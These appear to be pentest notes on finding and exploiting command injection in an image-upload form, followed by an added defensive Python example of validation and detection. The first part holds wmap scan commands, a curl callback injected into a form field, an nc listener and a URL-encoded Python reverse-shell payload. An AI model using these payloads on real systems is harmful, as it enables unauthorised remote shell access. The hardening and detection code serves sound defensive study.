Technique

WEB - Vulnerability Check

1.0 Metasploit wmap

load wmap
wmap_sites -a http://vict.im
wmap_targets -d 0
wmap_run -t
wmap_run -e
wmap_vulns

2.0 POST RCE Check

2.1 Python HTTP Server

python -m http.server 80

2.2 Check RCE (a request for /hfc84 showing up in the 2.1 server log confirms the injected command ran)

photo=blah.jpg&filetype=png;curl+10.10.XX.XX/hfc84&dimensions=3000x2000

2.3 Listener

nc -nvlp 443

2.4 Python Reverse Shell

URL Encoding

Encode the payload correctly with a URL-Encoder tool first; the encoded form below is what gets sent:

photo=blah.jpg&filetype=png%3bexport+RHOST%3d"10.10.XX.XX"%3bexport+RPORT%3d443%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000
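The checks in 2.2 and 2.4 only work because the filetype value is pasted into a shell command line. The following is an added example (not part of these notes) showing the vulnerable pattern beside a hardened handler and a log-review check; the field names and the convert command are assumed, and the request bodies are constructed samples with a placeholder host.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample bodies: the injected one mirrors the 2.2 check (placeholder
# host, nothing is contacted); the clean one is an ordinary upload request.
INJECTED_BODY = "photo=blah.jpg&filetype=png;curl+10.10.XX.XX/hfc84&dimensions=3000x2000"
CLEAN_BODY = "photo=blah.jpg&filetype=png&dimensions=3000x2000"

# Allow-list per field (assumed field names); anything outside is rejected,
# so ';', quotes or spaces never reach a command line.
FIELD_RULES = {
    "photo": re.compile(r"^[A-Za-z0-9_-]{1,64}\.(?:jpe?g|png)$"),
    "filetype": re.compile(r"^(?:png|jpe?g)$"),
    "dimensions": re.compile(r"^[1-9]\d{0,4}x[1-9]\d{0,4}$"),
}


def parse_body(body: str) -> dict:
    """Split an x-www-form-urlencoded body on '&' only, decoding %xx and '+'."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def build_cmd_unsafe(params: dict) -> str:
    """'Before': the string a vulnerable handler would pass to os.system / shell=True.
    Returned for inspection, never executed: the ';' carried in filetype makes the
    shell run a second command, which is exactly what the 2.2 check relies on."""
    return f"convert {params['photo']} -resize {params['dimensions']} out.{params['filetype']}"


def check_params(params: dict):
    """Return the first allow-list violation, or None when every field is clean."""
    for field, rule in FIELD_RULES.items():
        value = params.get(field, "")
        if not rule.fullmatch(value):
            return f"{field} rejected: {value!r}"
    return None


def flag_request(body: str):
    """Detection view: run the same rules over a captured POST body (WAF or
    access-log review) to surface injection attempts, URL-encoded or not."""
    return check_params(parse_body(body))


def build_argv_safe(params: dict) -> list:
    """'After': validate, then build an argv list for subprocess.run(argv)
    with no shell involved, so metacharacters are plain data."""
    reason = check_params(params)
    if reason:
        raise ValueError(reason)
    return ["convert", params["photo"], "-resize", params["dimensions"], f"out.{params['filetype']}"]
```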

References